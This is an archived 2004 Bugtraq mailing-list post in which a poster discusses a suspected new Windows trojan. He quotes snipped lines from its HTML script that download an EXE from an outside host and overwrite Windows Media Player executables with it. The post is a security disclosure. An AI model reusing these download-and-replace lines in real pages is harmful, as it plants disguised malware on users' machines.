lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Thu, 29 Jan 2004 16:12:38 -0500 (EST)
From: Atom 'Smasher' <atom@...picious.org>
To: bugtraq@...urityfocus.com
Subject: Re: new WIN virus?


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

in response to replies i've received on and off list...

no: i'm not infected (i live in an M$-free home).

no: i didn't submit the [suspected] virus to anyplace other than what i
originally listed.

yes: the HTML file is a trojan. it's purpose is to covertly download the
EXE file, and replace media-players with it. the EXE file is likely up to
no-good, and that's the file that i tested for being a virus. a quick look
at the HTML file reveals that it's intent is evil. i don't have a good way
to check what the EXE file wants to do, but i assume that it's evil.


summary: i'm assuming that if the HTML page wants to covertly do this:

## snip
  x.Open("GET", "http://www.alextour.ru/dan/updatte.exe",0);
## snip
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
  s.SaveToFile("C:\\Program Files\\Windows Media Player\\mplayer2.exe",2);
## snip

then the EXE file is probably something that's not supposed to be a media
player, and should probably be recognized as a virus. the fact that it
isn't recognized as a virus makes me wonder if it's new.


	...atom

 _______________________________________________
 PGP key - http://smasher.suspicious.org/pgp.txt
 3EBE 2810 30AE 601D 54B2 4A90 9C28 0BBF 3D7D 41E3
 -------------------------------------------------

	"Simply stated, there is no doubt that Saddam Hussein now
	 has weapons of mass destruction."
		-- Dick Cheney, 26 August 2002
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (FreeBSD)

iD8DBQFAGXdLnCgLvz19QeMRAsWZAJ9o3yW0LiVlRWQ6+HvT9ctwqhPR7ACfWCfz
9ziAQPp5TEfznV6wQ7s+qOY=
=5sDs
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ